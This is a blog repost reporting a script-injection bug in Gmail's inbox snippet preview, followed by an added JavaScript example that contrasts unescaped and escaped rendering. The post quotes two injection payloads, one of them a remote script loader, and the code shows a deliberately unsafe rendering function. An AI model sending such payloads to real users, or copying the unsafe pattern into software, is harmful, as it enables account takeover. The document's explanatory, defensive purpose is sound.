John "The Gneech" Robey (the_gneech) wrote,

From indigoskynet!

Gmail has a major security bug.

You know how it shows 'snippets' of the email near the subject line? If the snippet is javascript, gmail will execute it.

Yea.

It only works if you send it from an address that's *not* gmail, and apparently it has to have a subject, and it has to be a new page load, not an automatic refresh.

Very odd, but yea. It works.

1<SCRIPT>alert("haha")</SCRIPT>

So, if I can get this to load a remotely hosted .js file I could easily take over your gmail account.
Right now, as for me, I'm turning off the snippet option.

UPDATE:
1<SCRIPT SRC="URL"> will indeed execute. This means that a javascript file of any size can be executed, not just a tiny bit that fits in the snippet. We're talking major security flaw now. At best you can hope your firewall will catch it if it's trying to damage your computer.


Yeeks! *turns off snippets until further notice*

-TG
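
The behaviour reported above is what happens when message text is placed into the inbox page as markup instead of as text. The following is an added example, not code from the post or from Gmail; the function names, the page template and the 100-character snippet length are assumptions. It puts that pattern beside an escaped version, using the two strings quoted in the post as input:

```javascript
// Added illustration. SNIPPET_LEN, the template and all function names are assumptions.
const SNIPPET_LEN = 100;

// Vulnerable pattern: message text is truncated and concatenated straight into
// the page, so any tags in the mail body become live markup in the inbox view.
function renderSnippetUnsafe(subject, body) {
  const snippet = body.slice(0, SNIPPET_LEN);
  return `<span class="subject">${subject}</span> - <span class="snippet">${snippet}</span>`;
}

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode the characters that let text break out into tags or attributes.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hardened pattern: truncate the raw text first, then escape it. Escaping after
// truncation means an entity such as &lt; is never cut in half, and every
// sender-controlled field (subject included) is encoded before it reaches HTML.
function renderSnippetSafe(subject, body) {
  const snippet = escapeHtml(body.slice(0, SNIPPET_LEN));
  return `<span class="subject">${escapeHtml(subject)}</span> - <span class="snippet">${snippet}</span>`;
}

// True if the rendered HTML contains an opening <script> tag, in any letter case.
function hasScriptTag(html) {
  return /<\s*script\b/i.test(html);
}

// Sample bodies: the two strings quoted in the post, used here as test input.
const SAMPLES = [
  '1<SCRIPT>alert("haha")</SCRIPT>',
  '1<SCRIPT SRC="URL">',
];

// Render each sample both ways and report whether a script tag survives.
function demo() {
  return SAMPLES.map((body) => ({
    body,
    unsafeHasScript: hasScriptTag(renderSnippetUnsafe('hello', body)),
    safeHasScript: hasScriptTag(renderSnippetSafe('hello', body)),
    safeHtml: renderSnippetSafe('hello', body),
  }));
}

console.log(demo());
```

With the escaped version the sender's text shows up in the snippet as literal characters, which is the behaviour a reader expects from a preview.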